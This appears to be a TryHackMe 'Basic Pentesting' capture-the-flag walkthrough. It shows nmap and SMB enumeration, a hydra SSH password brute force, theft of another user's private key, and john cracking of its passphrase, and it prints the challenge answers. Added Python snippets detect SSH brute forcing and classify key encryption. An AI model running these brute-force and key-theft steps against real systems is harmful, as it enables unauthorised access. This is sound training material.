Basic Pentesting | TryHackMe Easy

Setting-up

Task 1: Deploy the machine and connect to our network

Task 2: Deploy the machine and connect to our network

Reconnaissance

```sh
sudo nmap -sV -sC -O <ip-addr>
```

Results:

```
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-08 02:12 EST
Nmap scan report for 10.10.66.136
Host is up (0.31s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
|   256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
|_  256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7
|_http-favicon: Apache Tomcat
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
| smb2-time: 
|   date: 2022-12-08T07:13:00
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2022-12-08T02:12:59-05:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.99 seconds
```

| Port | Service | Version |
|------|---------|---------|
| 22/tcp | ssh | OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 |
| 80/tcp | http | Apache/2.4.18 (Ubuntu) |
| 139/tcp | netbios | Samba smbd 3.X - 4.X |
| 445/tcp | netbios | Samba smbd 4.3.11-Ubuntu |
| 8009/tcp | ajp13 | Apache Jserv |
| 8080/tcp | http | Apache Tomcat/9.0.7 |

Directory bruteforcing

To find hidden directories we need to perform directory brute-forcing using tools such as gobuster, dirbuster, etc. In this case we are using gobuster!

```sh
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u <target-ip>
```
  • -w wordlist of common directory names
  • -u target URL
  • dir directory brute-force mode

Results:

```
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.66.136
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/08 02:02:32 Starting gobuster in directory enumeration mode
===============================================================
/development          (Status: 301) [Size: 318] [--> http://10.10.66.136/development/]
Progress: 4760 / 220561 (2.16%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/08 02:05:01 Finished
===============================================================
```

Task 3: What is the name of the hidden directory on the web server (enter name without /)?

development

Visit /development. Let’s check the contents of both files there:

dev.txt

j.txt

As we guessed earlier, here are the dev notes. Apparently, the web server users’ usernames start with “j” and “k”. We can definitely use this information in the future. In addition, Mr. K said that “SMB has been configured”, which the Nmap scan confirmed.

SMB Enumeration

```sh
cd /usr/share/nmap/scripts
nmap --script=smb-enum* <target-ip>
```

Results:

```
nmap --script=smb-enum* 10.10.66.136
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-08 02:39 EST
Nmap scan report for 10.10.66.136
Host is up (0.30s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.66.136\Anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\anonymous
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.66.136\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Samba Server 4.3.11-Ubuntu)
|     Users: 3
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
| smb-enum-sessions: 
|_  <nobody>
| smb-enum-domains: 
|   BASIC2
|     Groups: n/a
|     Users: n/a
|     Creation time: unknown
|     Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
|     Account lockout disabled
|   Builtin
|     Groups: n/a
|     Users: n/a
|     Creation time: unknown
|     Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
|_    Account lockout disabled

Nmap done: 1 IP address (1 host up) scanned in 327.23 seconds
```

As we can clearly see, there are Anonymous and IPC$ (hidden) shares. The IPC$ share enables inter-process communication, and the server accepts anonymous logins, which require no username or password. We can leverage this to our advantage by using the smbclient command to access the Anonymous share.

```sh
smbclient //<target-ip>/anonymous
```

staff.txt might contain some useful information, so let’s download it to our machine with the get staff.txt command.

```sh
cat staff.txt
```
```
Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay
```

It seems we’ve found the “k” and “j” users who first showed up in the dev notes. As the SSH port is open and we know from Kay’s note (j.txt) that Jan has a weak password, let’s run hydra to crack Jan’s password and get inside the server.

Task 4: Use brute-forcing to find the username & password

Task 5: What is the username?

jan

SSH Bruteforcing

To brute-force the username and password, Hydra is the best tool!

```sh
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<target-ip>
```
  • -l username
  • -P password wordlist

Output:

```
┌──(root㉿kali)-[/usr]
└─# hydra -l jan -P share/wordlists/rockyou ssh://10.10.66.136
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-08 03:04:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.66.136:22/
[STATUS] 128.00 tries/min, 128 tries in 00:01h, 14344273 to do in 1867:45h, 14 active
[STATUS] 98.67 tries/min, 296 tries in 00:03h, 14344105 to do in 2422:60h, 14 active
[STATUS] 94.00 tries/min, 658 tries in 00:07h, 14343743 to do in 2543:14h, 14 active
[22][ssh] host: 10.10.66.136   login: jan   password: armando
^C
```

> From this point we can log in to the machine using **jan** and **armando** through SSH.
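The STATUS lines above show hydra sending roughly 94 to 128 login attempts per minute against a single account, a pattern that is easy to spot on the target. As an added defensive example (not part of the original write-up), the script below groups sshd “Failed password” entries by source address and user over a sliding window and alerts on that rate; the auth.log lines, host names and addresses are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# sshd "Failed password" line in syslog format (no year), as written to /var/log/auth.log
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)

def parse_failed(line, year=2022):
    """Return (timestamp, user, ip) for a failed-password line, else None."""
    m = FAILED_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["user"], m["ip"]

def detect_bruteforce(lines, threshold=10, window_s=60):
    """Alert once per (ip, user) pair that reaches `threshold` failures inside a
    sliding window of `window_s` seconds. Returns [(ip, user, first_ts, count)]."""
    windows = defaultdict(deque)
    alerts = {}
    for line in lines:
        parsed = parse_failed(line)
        if parsed is None:
            continue
        ts, user, ip = parsed
        q = windows[(ip, user)]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # drop events outside the window
            q.popleft()
        if len(q) >= threshold and (ip, user) not in alerts:
            alerts[(ip, user)] = (ip, user, q[0], len(q))
    return list(alerts.values())

# Constructed sample: 12 failures for 'jan' from one host in 11 seconds (a hydra-like
# rate), plus one unrelated failure that must not raise an alert.
SAMPLE_LOG = [
    f"Dec  8 03:04:{2 + i:02d} basic2 sshd[{1200 + i}]: Failed password for jan "
    f"from 10.9.0.5 port {40000 + i} ssh2" for i in range(12)
] + ["Dec  8 03:10:00 basic2 sshd[1300]: Failed password for invalid user admin "
     "from 10.9.0.7 port 50000 ssh2"]

if __name__ == "__main__":
    for ip, user, first, count in detect_bruteforce(SAMPLE_LOG):
        print(f"ALERT: {count} failed SSH logins for {user} from {ip} since {first}")
```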


Task 6: What is the password?

armando

Task 7: What service do you use to access the server (answer in abbreviation in all caps)?

SSH

Task 8: Enumerate the machine to find any vectors for privilege escalation

## Gaining access through SSH

```sh
ssh jan@<target-ip>
```

Enter the password: armando

We got access!!

Privilege Escalation

```
jan@basic2:~$ cd ../kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo
jan@basic2:/home/kay$
```

Go to the .ssh folder:

```sh
cd .ssh
```

Here you can see all of kay’s RSA keys. So now the task is to get those keys onto our computer, which we can do with the rsync or scp commands.

Otherwise, just run cat id_rsa, copy the output and save it into a file on your computer.

```sh
ssh2john <id_rsa-file-you-copied.txt> >> hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

Here you go, we got a password!!!

```
john forjohn.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (/home/local_host/id_rsa.txt)
1g 0:00:00:00 DONE (2022-12-08 03:31) 25.00g/s 2068Kp/s 2068Kc/s 2068KC/s behlat..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
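John reports cost 1 (KDF/cipher) as 0 and an iteration count of 1, i.e. the key was stored in the legacy PEM format, whose passphrase is stretched with a single MD5 iteration, which is why rockyou was exhausted instantly. The check below (an added example, not part of the write-up) tells such legacy-encrypted keys apart from the modern openssh-key-v1 format with bcrypt rounds; the key files it inspects are constructed header-only stand-ins with no real key material.

```python
import base64
import struct

MAGIC = b"openssh-key-v1\x00"

def _read_string(buf, off):
    """Read one uint32-length-prefixed string from the openssh-key-v1 binary layout."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def key_protection(pem_text):
    """Classify how an OpenSSH private key file protects its passphrase:
    'unencrypted', 'legacy-pem-md5', ('bcrypt', rounds) or ('unknown-kdf', name)."""
    lines = [l.strip() for l in pem_text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(blob, len(MAGIC))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        if cipher == b"none" or kdf == b"none":
            return "unencrypted"
        if kdf == b"bcrypt":                      # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            return ("bcrypt", struct.unpack_from(">I", kdfopts, o)[0])
        return ("unknown-kdf", kdf.decode())
    # Legacy PEM (BEGIN RSA/DSA/EC PRIVATE KEY): encryption is signalled by a Proc-Type
    # header and the key comes from one iteration of MD5 (EVP_BytesToKey), cheap to guess.
    if any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines):
        return "legacy-pem-md5"
    return "unencrypted"

def make_v1_header(cipher, kdf, kdfopts):
    """Constructed header-only openssh-key-v1 file (no real key material) for testing."""
    s = lambda b: struct.pack(">I", len(b)) + b
    body = MAGIC + s(cipher) + s(kdf) + s(kdfopts) + struct.pack(">I", 1) + s(b"") + s(b"")
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(body).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")

# Constructed samples: a legacy-format encrypted key (what john labelled MD5/AES, cost 0)
# and a modern key whose passphrase is stretched with 16 bcrypt rounds.
LEGACY_KEY = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
              "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\nQUJD\n"
              "-----END RSA PRIVATE KEY-----\n")
MODERN_KEY = make_v1_header(b"aes256-ctr", b"bcrypt", struct.pack(">I", 16) + b"\0" * 16 + struct.pack(">I", 16))

if __name__ == "__main__":
    print(key_protection(LEGACY_KEY), key_protection(MODERN_KEY))
```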

Log in to kay’s account now!

```sh
chmod 700 id_rsa.txt
ssh -i id_rsa.txt kay@<target-ip>
```

The passphrase for the key id_rsa.txt is beeswax.

Mission Accomplished!!

Task 9: What is the name of the other user you found (all lower case)?

kay

Task 10: If you have found another user, what can you do with this information?

Task 11: What is the final password you obtain?

heresareallystrongpasswordthatfollowsthepasswordpolicy$$

This post is licensed under CC BY 4.0 by the author.
